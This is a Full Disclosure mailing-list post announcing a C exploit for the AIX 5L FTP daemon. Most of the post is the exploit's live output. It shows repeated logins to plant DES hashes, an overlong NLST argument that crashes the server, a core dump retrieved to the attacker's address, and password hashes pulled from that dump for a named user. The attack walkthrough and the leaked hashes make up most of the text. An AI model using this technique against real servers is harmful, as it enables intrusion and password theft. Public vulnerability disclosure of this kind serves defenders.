Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Advanced AIX 5l FTPd Exploit

From: "HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>
Date: Fri, 23 Jul 2010 05:27:03 +0200
Attached is another version of my AIX 5l FTPd exploit written in C to be
more portable & powerful between hosts :>

The Exploit in action:

[root@vs2067037 kcope]# ./aix -h ftp.ABABABABABA.edu -i 85.25.67.37 -c
jkateley
<       220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
populating DES hash in memory...

      USER jkateley

<       331 Password required for jkateley.

      PASS abcdef

<       530 Login incorrect.

      USER jkateley

<       331 Password required for jkateley.

      PASS abcdef

<       530 Login incorrect.

      USER jkateley

<       331 Password required for jkateley.

      PASS abcdef

<       530 Login incorrect.
logging in...

      USER ftp

<       331 Guest login ok, send ident as password.

      PASS guest

<       230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh
from docsis1-137
230-Last login: Thu Jul 22 21:12:23 MDT 2010 on ftp from
vs2067037.vserver.de
<       230 Guest login ok, access restrictions apply.
changing directory...

      CWD pub

<       250 CWD command successful.
triggering segmentation violation...

      NLST

~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
trigger succeeded!
<       220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
logging in 2nd time...

      USER ftp

<       331 Guest login ok, send ident as password.

      PASS guest

<       230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh
from docsis1-137
230-Last login: Thu Jul 22 21:12:33 MDT 2010 on ftp from
vs2067037.vserver.de
<       230 Guest login ok, access restrictions apply.
changing directory...

      CWD pub

<       250 CWD command successful.
getting core file...

      TYPE I

<       200 Type set to I.

      PORT 85,25,67,37,98,23

<       200 PORT command successful.

      RETR core

<       150 Opening data connection for core (3979727 bytes).
finally extracting DES hashes from core file for user 'jkateley'...
PbdsrHgkIuvp2
9aS4EOARuLSqA
PbdsrHgkIuvp2
logininterval
loginreenable
9aS4EOARuLSqA
logininterval
loginreenable
YIELDLOOPTIME
YIELDLOOPTIME
YIELDLOOPTIME
YIELDLOOPTIME
MALLOCBUCKETS
PREREQUISITES
logininterval
loginreenable
loginreenable
logininterval
done.
[root@vs2067037 kcope]#

Attachment: aix.c
Description: 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: